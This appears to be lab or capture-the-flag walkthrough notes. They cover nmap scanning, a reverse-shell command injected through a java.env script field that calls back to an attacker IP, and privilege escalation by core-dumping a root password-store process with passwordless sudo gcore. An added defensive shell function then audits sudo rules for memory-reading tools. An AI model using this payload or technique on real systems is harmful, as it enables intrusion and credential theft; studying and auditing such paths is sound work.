nmapAutomator.sh -H 192.168.237.98 -t full
nmapAutomator.sh -H 192.168.237.98 -t vulns
java.env script field can be used to execute arbitrary commands. For instance, we can trigger a reverse shell with:
$(bash -i >& /dev/tcp/192.168.49.237/4242 0>&1)
root runs a binary, /usr/bin/password-store. We don't have permissions to run this, but it looks interesting.
gcore as root with no password.
gcore creates a core dump of a running process. A core file or core dump is a file that records the memory image of a running process and its process status.
ps -ef | grep password-store, we find that the process ID is 493. Then, we can run
sudo to create a core dump of the process.
strings core.493), we find something interesting.
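The passwordless sudo rule for gcore described above is what an audit should catch. The following is an added example, not part of the original write-up: a shell function that scans `sudo -l` style output for passwordless rules on binaries that can read another process's memory. The tool list and the function name are assumptions made for illustration.

```shell
#!/bin/sh
# Added example (not from the original write-up).
# MEMORY_TOOLS is an illustrative assumption: binaries able to read the
# memory of another process. Extend it to match local policy.
MEMORY_TOOLS="gcore gdb"

# Reads `sudo -l` style output on stdin and prints "runas<TAB>command" for
# every passwordless rule whose binary is listed in MEMORY_TOOLS.
# Exit status: 0 if at least one such rule was found, 1 otherwise.
# Limitation: commas escaped inside command arguments are not handled.
audit_sudo_rules() {
    awk -v tools="$MEMORY_TOOLS" '
    BEGIN {
        n = split(tools, t, " ")
        for (i = 1; i <= n; i++) risky[t[i]] = 1
        found = 0
    }
    # Rule lines look like: "    (root) NOPASSWD: /path/a, /path/b args"
    /^[ \t]*\(/ {
        line = $0
        sub(/^[ \t]*\(/, "", line)
        runas = line
        sub(/\).*/, "", runas)               # text inside the parentheses
        sub(/^[^)]*\)[ \t]*/, "", line)      # tags and commands that follow
        m = split(line, entries, ",")
        nopasswd = 0                         # a tag carries over to later entries
        for (i = 1; i <= m; i++) {
            e = entries[i]
            sub(/^[ \t]+/, "", e)
            # Peel off leading tags such as NOPASSWD: or SETENV:
            while (match(e, /^[A-Z_]+:[ \t]*/)) {
                tag = substr(e, 1, index(e, ":") - 1)
                if (tag == "NOPASSWD") nopasswd = 1
                else if (tag == "PASSWD") nopasswd = 0
                e = substr(e, RLENGTH + 1)
            }
            if (!nopasswd) continue
            split(e, words, " ")             # words[1] is the binary path
            k = split(words[1], parts, "/")  # parts[k] is its basename
            if (parts[k] in risky) {
                printf "%s\t%s\n", runas, e
                found = 1
            }
        }
    }
    END { exit (found ? 0 : 1) }'
}
```

Run it as `sudo -l -U <user> | audit_sudo_rules` for each account under review; any line it prints is a rule that lets that account read secrets held in another process's memory.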